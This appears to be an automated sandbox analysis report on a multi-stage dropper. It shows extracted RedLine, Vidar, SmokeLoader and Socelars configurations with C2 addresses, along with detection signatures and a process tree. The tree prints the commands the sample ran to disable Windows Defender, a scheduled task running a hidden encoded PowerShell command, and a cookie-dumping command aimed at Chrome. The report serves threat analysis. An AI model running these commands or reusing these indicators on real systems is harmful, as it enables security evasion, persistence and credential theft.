Analysis
max time kernel: 59s
max time network: 172s
platform: windows10_x64
resource: win10-en-20211208
submitted: 20/12/2021, 14:02

Static task: static1
Behavioral task: behavioral1
  Sample: 99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe
  Resource: win10-en-20211208
General
Target: 99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe
Size: 7.0MB
MD5: 27ee0fff858ebb65e9d645b3890418f9
SHA1: 78cce78871932c34b30a16296063ee1ca6c152e5
SHA256: 99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa
SHA512: 193f9dca9b3a7f26b7e0222d784e2f88f76743141c51917ba4dc4232ba1e2205b9fa53762c55926f53ea9c37670d121ab971e77ed0e33641db51ee355737ef05
Malware Config
Extracted: socelars
  http://www.biohazardgraphics.com/
Extracted: vidar
  49.1
  915
  https://noc.social/@sergeev46
  https://c.im/@sergeev47
  profile_id: 915
Extracted: smokeloader
  2020
  http://rcacademy.at/upload/
  http://e-lanpengeonline.com/upload/
  http://vjcmvz.cn/upload/
  http://galala.ru/upload/
  http://witra.ru/upload/
Extracted: redline
  v3user1
  159.69.246.184:13127
Signatures

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1448 | 4824 | rundll32.exe | 130

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload 5 IoCs
resource | yara_rule
behavioral2/memory/4288-319-0x0000000000800000-0x00000000009CF000-memory.dmp | family_redline
behavioral2/memory/4104-321-0x0000000000400000-0x0000000000420000-memory.dmp | family_redline
behavioral2/memory/4288-322-0x0000000000800000-0x00000000009CF000-memory.dmp | family_redline
behavioral2/memory/4116-328-0x000000000041933A-mapping.dmp | family_redline
behavioral2/memory/4104-326-0x0000000000419336-mapping.dmp | family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload 2 IoCs
resource | yara_rule
behavioral2/files/0x000500000001ab48-175.dat | family_socelars
behavioral2/files/0x000500000001ab48-216.dat | family_socelars

NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource | yara_rule
behavioral2/files/0x000700000001ab4c-171.dat | WebBrowserPassView
behavioral2/files/0x000700000001ab4c-209.dat | WebBrowserPassView

Nirsoft 5 IoCs
resource | yara_rule
behavioral2/files/0x000700000001ab4c-171.dat | Nirsoft
behavioral2/files/0x000700000001ab4c-209.dat | Nirsoft
behavioral2/files/0x000500000001ab63-295.dat | Nirsoft
behavioral2/files/0x000500000001ab63-296.dat | Nirsoft
behavioral2/memory/1392-299-0x0000000000400000-0x0000000000455000-memory.dmp | Nirsoft

Vidar Stealer 3 IoCs
resource | yara_rule
behavioral2/memory/1256-272-0x00000000005C0000-0x000000000070A000-memory.dmp | family_vidar
behavioral2/memory/628-271-0x0000000002240000-0x0000000002319000-memory.dmp | family_vidar
behavioral2/memory/628-274-0x0000000000400000-0x0000000000535000-memory.dmp | family_vidar

(untitled signature) 6 IoCs
resource | yara_rule
behavioral2/files/0x000600000001ab30-127.dat | aspack_v212_v242
behavioral2/files/0x000600000001ab30-128.dat | aspack_v212_v242
behavioral2/files/0x000600000001ab37-126.dat | aspack_v212_v242
behavioral2/files/0x000600000001ab37-131.dat | aspack_v212_v242
behavioral2/files/0x000600000001ab3a-132.dat | aspack_v212_v242
behavioral2/files/0x000600000001ab3a-133.dat | aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 33 IoCs
pid | Process
3036 | setup_installer.exe
3956 | setup_install.exe
2916 | Sun1050791613c996ff.exe
3708 | Sun108e4051ef0.exe
628 | Sun10d73b7785b.exe
3700 | Sun1074b86ebb831862.exe
1256 | Sun10f1b87ddac.exe
1680 | Sun10467c5b95.exe
1516 | Sun10aa9ae1c57b995f.exe
2208 | Sun1050791613c996ff.exe
3456 | Sun10de08ca9cb.exe
2456 | Sun10ee0af6c65e215a.exe
3488 | Sun10fd677cdc.exe
2240 | Sun10f51ad6615.exe
1608 | Sun106a84a94b0.exe
2096 | Sun10df2d13b8e171d6f.exe
1844 | Sun1084932dd6b.exe
2424 | Sun10fe8cb62035134.exe
3932 | Sun1084932dd6b.exe
1208 | Sun10fe8cb62035134.tmp
3304 | Sun10fe8cb62035134.exe
1348 | Sun10fe8cb62035134.tmp
1812 | c0a2c849-5063-4935-ab6d-e64215a5a417.exe
1392 | 11111.exe
2932 | d447a67e-39e8-4f6a-a12a-e9f5d8a8ff8d.exe
4288 | f67369eb-64f2-4d2e-af91-189ade5f689a.exe
4308 | windllhost.exe
4104 | Sun10aa9ae1c57b995f.exe
4116 | Sun10f51ad6615.exe
4416 | 99bc6450-4f49-4a6d-b27a-543ddf1db221.exe
4500 | 927c01de-e6a5-4887-8d30-8616657f8e14.exe
4656 | 11111.exe
4912 | 4742347347423473.exe

Loads dropped DLL 11 IoCs
pid | Process
3956 | setup_install.exe
3956 | setup_install.exe
3956 | setup_install.exe
3956 | setup_install.exe
3956 | setup_install.exe
1208 | Sun10fe8cb62035134.tmp
1348 | Sun10fe8cb62035134.tmp
1064 | rundll32.exe
1064 | rundll32.exe
1268 | rundll32.exe
1268 | rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs

Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\218457123 = "C:\\Users\\Admin\\AppData\\Roaming\\31062152\\4742347347423473.exe" | d447a67e-39e8-4f6a-a12a-e9f5d8a8ff8d.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
23 | ip-api.com
67 | ipinfo.io
68 | ipinfo.io
237 | ipinfo.io
238 | ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid | Process
4288 | f67369eb-64f2-4d2e-af91-189ade5f689a.exe
4416 | 99bc6450-4f49-4a6d-b27a-543ddf1db221.exe

Suspicious use of SetThreadContext 3 IoCs
description | pid | Process | procid_target
PID 1844 set thread context of 3932 | 1844 | Sun1084932dd6b.exe | 112
PID 1516 set thread context of 4104 | 1516 | Sun10aa9ae1c57b995f.exe | 122
PID 2240 set thread context of 4116 | 2240 | Sun10f51ad6615.exe | 121

Drops file in Program Files directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Program Files (x86)\FarLabUninstaller\unins000.dat | Sun10fe8cb62035134.tmp
File created | C:\Program Files (x86)\FarLabUninstaller\unins000.dat | Sun10fe8cb62035134.tmp
File created | C:\Program Files (x86)\FarLabUninstaller\is-UMT7L.tmp | Sun10fe8cb62035134.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sun10f1b87ddac.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sun10f1b87ddac.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | Sun10f1b87ddac.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2196 | schtasks.exe
6200 | schtasks.exe
6192 | schtasks.exe

Kills process with taskkill 5 IoCs
pid | Process
4348 | taskkill.exe
4396 | taskkill.exe
4752 | taskkill.exe
4948 | taskkill.exe
2284 | taskkill.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description | flow | ioc
HTTP User-Agent header | 21 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
1256 | Sun10f1b87ddac.exe
1256 | Sun10f1b87ddac.exe
1056 | powershell.exe
988 | powershell.exe
988 | powershell.exe
3056 | Process not Found
(the row "3056 | Process not Found" is repeated for the remaining 59 rows of this table)

Suspicious behavior: MapViewOfSection 1 IoCs
pid | Process
1256 | Sun10f1b87ddac.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 3708 | Sun108e4051ef0.exe
Token: SeCreateTokenPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeAssignPrimaryTokenPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeLockMemoryPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeIncreaseQuotaPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeMachineAccountPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeTcbPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeSecurityPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeTakeOwnershipPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeLoadDriverPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeSystemProfilePrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeSystemtimePrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeProfSingleProcessPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeIncBasePriorityPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeCreatePagefilePrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeCreatePermanentPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeBackupPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeRestorePrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeShutdownPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeDebugPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeAuditPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeSystemEnvironmentPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeChangeNotifyPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeRemoteShutdownPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeUndockPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeSyncAgentPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeEnableDelegationPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeManageVolumePrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeImpersonatePrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeCreateGlobalPrivilege | 2096 | Sun10df2d13b8e171d6f.exe
Token: 31 | 2096 | Sun10df2d13b8e171d6f.exe
Token: 32 | 2096 | Sun10df2d13b8e171d6f.exe
Token: 33 | 2096 | Sun10df2d13b8e171d6f.exe
Token: 34 | 2096 | Sun10df2d13b8e171d6f.exe
Token: 35 | 2096 | Sun10df2d13b8e171d6f.exe
Token: SeDebugPrivilege | 1516 | Sun10aa9ae1c57b995f.exe
Token: SeDebugPrivilege | 2240 | Sun10f51ad6615.exe
Token: SeDebugPrivilege | 1608 | Sun106a84a94b0.exe
Token: SeDebugPrivilege | 988 | powershell.exe
Token: SeDebugPrivilege | 1056 | powershell.exe
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found
Token: SeShutdownPrivilege | 3056 | Process not Found
Token: SeCreatePagefilePrivilege | 3056 | Process not Found

Suspicious use of FindShellTrayWindow 1 IoCs
pid | Process
1348 | Sun10fe8cb62035134.tmp

Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2720 wrote to memory of 3036 | 2720 | 99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe | 69
PID 2720 wrote to memory of 3036 | 2720 | 99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe | 69
PID 2720 wrote to memory of 3036 | 2720 | 99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe | 69
PID 3036 wrote to memory of 3956 | 3036 | setup_installer.exe | 70
PID 3036 wrote to memory of 3956 | 3036 | setup_installer.exe | 70
PID 3036 wrote to memory of 3956 | 3036 | setup_installer.exe | 70
PID 3956 wrote to memory of 1304 | 3956 | setup_install.exe | 73
PID 3956 wrote to memory of 1304 | 3956 | setup_install.exe | 73
PID 3956 wrote to memory of 1304 | 3956 | setup_install.exe | 73
PID 3956 wrote to memory of 3964 | 3956 | setup_install.exe | 74
PID 3956 wrote to memory of 3964 | 3956 | setup_install.exe | 74
PID 3956 wrote to memory of 3964 | 3956 | setup_install.exe | 74
PID 3956 wrote to memory of 448 | 3956 | setup_install.exe | 75
PID 3956 wrote to memory of 448 | 3956 | setup_install.exe | 75
PID 3956 wrote to memory of 448 | 3956 | setup_install.exe | 75
PID 3956 wrote to memory of 784 | 3956 | setup_install.exe | 76
PID 3956 wrote to memory of 784 | 3956 | setup_install.exe | 76
PID 3956 wrote to memory of 784 | 3956 | setup_install.exe | 76
PID 3956 wrote to memory of 1712 | 3956 | setup_install.exe | 77
PID 3956 wrote to memory of 1712 | 3956 | setup_install.exe | 77
PID 3956 wrote to memory of 1712 | 3956 | setup_install.exe | 77
PID 3956 wrote to memory of 4080 | 3956 | setup_install.exe | 81
PID 3956 wrote to memory of 4080 | 3956 | setup_install.exe | 81
PID 3956 wrote to memory of 4080 | 3956 | setup_install.exe | 81
PID 3956 wrote to memory of 2876 | 3956 | setup_install.exe | 78
PID 3956 wrote to memory of 2876 | 3956 | setup_install.exe | 78
PID 3956 wrote to memory of 2876 | 3956 | setup_install.exe | 78
PID 4080 wrote to memory of 2916 | 4080 | cmd.exe | 79
PID 4080 wrote to memory of 2916 | 4080 | cmd.exe | 79
PID 4080 wrote to memory of 2916 | 4080 | cmd.exe | 79
PID 784 wrote to memory of 3708 | 784 | cmd.exe | 80
PID 784 wrote to memory of 3708 | 784 | cmd.exe | 80
PID 3956 wrote to memory of 3376 | 3956 | setup_install.exe | 82
PID 3956 wrote to memory of 3376 | 3956 | setup_install.exe | 82
PID 3956 wrote to memory of 3376 | 3956 | setup_install.exe | 82
PID 1304 wrote to memory of 1056 | 1304 | cmd.exe | 98
PID 1304 wrote to memory of 1056 | 1304 | cmd.exe | 98
PID 1304 wrote to memory of 1056 | 1304 | cmd.exe | 98
PID 1712 wrote to memory of 628 | 1712 | cmd.exe | 83
PID 1712 wrote to memory of 628 | 1712 | cmd.exe | 83
PID 1712 wrote to memory of 628 | 1712 | cmd.exe | 83
PID 3964 wrote to memory of 988 | 3964 | cmd.exe | 97
PID 3964 wrote to memory of 988 | 3964 | cmd.exe | 97
PID 3964 wrote to memory of 988 | 3964 | cmd.exe | 97
PID 3956 wrote to memory of 1440 | 3956 | setup_install.exe | 96
PID 3956 wrote to memory of 1440 | 3956 | setup_install.exe | 96
PID 3956 wrote to memory of 1440 | 3956 | setup_install.exe | 96
PID 3956 wrote to memory of 1268 | 3956 | setup_install.exe | 95
PID 3956 wrote to memory of 1268 | 3956 | setup_install.exe | 95
PID 3956 wrote to memory of 1268 | 3956 | setup_install.exe | 95
PID 3956 wrote to memory of 1088 | 3956 | setup_install.exe | 84
PID 3956 wrote to memory of 1088 | 3956 | setup_install.exe | 84
PID 3956 wrote to memory of 1088 | 3956 | setup_install.exe | 84
PID 3956 wrote to memory of 1332 | 3956 | setup_install.exe | 94
PID 3956 wrote to memory of 1332 | 3956 | setup_install.exe | 94
PID 3956 wrote to memory of 1332 | 3956 | setup_install.exe | 94
PID 2876 wrote to memory of 3700 | 2876 | cmd.exe | 93
PID 2876 wrote to memory of 3700 | 2876 | cmd.exe | 93
PID 2876 wrote to memory of 3700 | 2876 | cmd.exe | 93
PID 1268 wrote to memory of 1256 | 1268 | cmd.exe | 92
PID 1268 wrote to memory of 1256 | 1268 | cmd.exe | 92
PID 1268 wrote to memory of 1256 | 1268 | cmd.exe | 92
PID 3956 wrote to memory of 2364 | 3956 | setup_install.exe | 85
PID 3956 wrote to memory of 2364 | 3956 | setup_install.exe | 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe"C:\Users\Admin\AppData\Local\Temp\99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10467c5b95.exe4⤵PID:448
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10467c5b95.exeSun10467c5b95.exe5⤵
- Executes dropped EXE
PID:1680 -
C:\Users\Admin\Pictures\Adobe Films\EXSNwvbiYOmfXKGKgs3Ku6Pi.exe"C:\Users\Admin\Pictures\Adobe Films\EXSNwvbiYOmfXKGKgs3Ku6Pi.exe"6⤵PID:4800
-
-
C:\Users\Admin\Pictures\Adobe Films\q5I2dJJV6kK7x8RRCnHC1M9e.exe"C:\Users\Admin\Pictures\Adobe Films\q5I2dJJV6kK7x8RRCnHC1M9e.exe"6⤵PID:2368
-
-
C:\Users\Admin\Pictures\Adobe Films\0OppErD0bsEo_NalHxGugaq5.exe"C:\Users\Admin\Pictures\Adobe Films\0OppErD0bsEo_NalHxGugaq5.exe"6⤵PID:2800
-
C:\Users\Admin\AppData\Local\a876bd7a-f3c2-453b-86cd-ac22b22e468e.exe"C:\Users\Admin\AppData\Local\a876bd7a-f3c2-453b-86cd-ac22b22e468e.exe"7⤵PID:5224
-
-
C:\Users\Admin\AppData\Local\8f4f023a-1e19-4b03-8c88-6390a95e1642.exe"C:\Users\Admin\AppData\Local\8f4f023a-1e19-4b03-8c88-6390a95e1642.exe"7⤵PID:2144
-
-
C:\Users\Admin\AppData\Local\5c6c344d-d780-416b-bc74-d1aa11f14a27.exe"C:\Users\Admin\AppData\Local\5c6c344d-d780-416b-bc74-d1aa11f14a27.exe"7⤵PID:4336
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PnthudFnJxDTaFR6hCSUQSRL.exe"C:\Users\Admin\Pictures\Adobe Films\PnthudFnJxDTaFR6hCSUQSRL.exe"6⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"7⤵PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\zhangting.exe"C:\Users\Admin\AppData\Local\Temp\zhangting.exe"7⤵PID:5516
-
C:\Users\Admin\AppData\Local\Temp\zhangting.exe"C:\Users\Admin\AppData\Local\Temp\zhangting.exe" -u8⤵PID:3988
-
-
-
C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"7⤵PID:4852
-
-
C:\Users\Admin\AppData\Local\Temp\inst.exe"C:\Users\Admin\AppData\Local\Temp\inst.exe"7⤵PID:4352
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:4452
-
-
C:\Users\Admin\AppData\Local\Temp\setup1.exe"C:\Users\Admin\AppData\Local\Temp\setup1.exe"7⤵PID:4612
-
-
C:\Users\Admin\AppData\Local\Temp\racoon.exe"C:\Users\Admin\AppData\Local\Temp\racoon.exe"7⤵PID:4928
-
-
C:\Users\Admin\AppData\Local\Temp\askhelp.exe"C:\Users\Admin\AppData\Local\Temp\askhelp.exe"7⤵PID:4340
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:4652
-
-
C:\Users\Admin\AppData\Local\Temp\logger.exe"C:\Users\Admin\AppData\Local\Temp\logger.exe"7⤵PID:3936
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵PID:6024
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵PID:5280
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"6⤵PID:5192
-
C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"7⤵PID:5388
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4ePcItbOIFBNfJJYafOyxx5O.exe"C:\Users\Admin\Pictures\Adobe Films\4ePcItbOIFBNfJJYafOyxx5O.exe"6⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\7zSB107.tmp\Install.exe.\Install.exe7⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\7zSD326.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵PID:5792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵PID:5076
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵PID:1152
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:5456
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵PID:2412
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵PID:4456
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵PID:4636
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵PID:5864
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYpzmTZDv" /SC once /ST 00:56:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
PID:2196
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"6⤵PID:5356
-
C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"7⤵PID:4404
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0pLeABNB_2OGcWGTckrKLPxb.exe"C:\Users\Admin\Pictures\Adobe Films\0pLeABNB_2OGcWGTckrKLPxb.exe"6⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5684
-
-
